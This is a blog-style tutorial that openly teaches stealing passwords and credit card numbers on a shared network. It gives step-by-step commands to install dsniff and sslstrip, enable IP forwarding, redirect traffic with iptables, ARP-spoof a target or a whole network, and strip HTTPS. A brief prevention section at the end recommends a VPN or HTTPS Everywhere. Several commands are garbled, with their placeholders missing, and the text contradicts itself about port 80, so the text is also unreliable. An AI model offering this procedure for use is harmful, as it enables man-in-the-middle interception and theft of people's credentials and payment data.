How to EASILY Steal Encrypted Passwords and Credit Card Numbers with SSLStrip

How does this work?

First, arpspoof tricks the router that we are the target, and the target that we are the router. This lets us recieve all the traffic from the target that is meant to go to the router. From there, we can modify any of the traffic that we receive. Once we receive traffic, we send all traffic except traffic meant for port 80 (http traffic) to SSL Strip. SSL Strip will then watch for HTTPS links and redirects, and then will map those links to either similar http links or homograph-smilar HTTPS links. Therefore  all the traffic is now unencrypted and sent in plain-text and we can easily see passwords and other sensitive data submitted over the network.

 

Instructions:

1. First off, you need to make sure you have Python and Twisted Web installed. Also, you will need to have the dsniff suite installed

sudo apt-get install python

sudo apt-get install python-twisted

sudo apt-get install dsniff

2. Once both of those dependencies are installed you have to make sure traffic forwarding is enabled.

echo “1” > /proc/sys/net/ipv4/ip_forward

3. Now you have to forward all traffic except port 80 to a listening port (for example, where it says , you can type “1000” without quotes.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port

4. Download SSL Strip from Moxie Marlinspike’s (the awesome guy who created SSL Strip) website. Once it’s downloaded, you can install it by typing sudo python setup.py install into your CLI (Command Line Interface). Make sure you are in the correct directory.

cd /Whatever/Directory/SSLStrip/is/In

sudo python setup.py install

5. Lastly, you need to trick everyone (or a single target/computer) that the router is your computer. (Where put your wireless card, where put the targets IP, where gatewayIP is put the gateways IP. Usually 192.168.1.1 or 192.168.0.1) If you want to target the entire network, use the 3rd command.

arpspoof -i -t

e.g “arpspoof -i wlan0 -t 192.168.1.199 192.168.1.1

arpspoof -i

Starting SSLStrip “sslstrip -l <listenPort>” without quotes

Congratulations, you have successfully routed every packet through your computer and are able to capture people’s passwords, credit cards, and other sensitive information. Always remember though:

With great power, comes great responsibility

How to Prevent this sort of attack?

There are a couple of options. The easiest, is to use a VPN. This will make it impossible for someone to follow these instructions and get your information. If you don’t want to do that, you can also use HTTPS Everywhere  which will force everything to go through HTTPS and will not let it go through HTTP. This option also works, but if you can, use a VPN.

 

Thanks for reading and if you have any questions or tips (or just want to say thanks), let me know in the comments!

About Michael David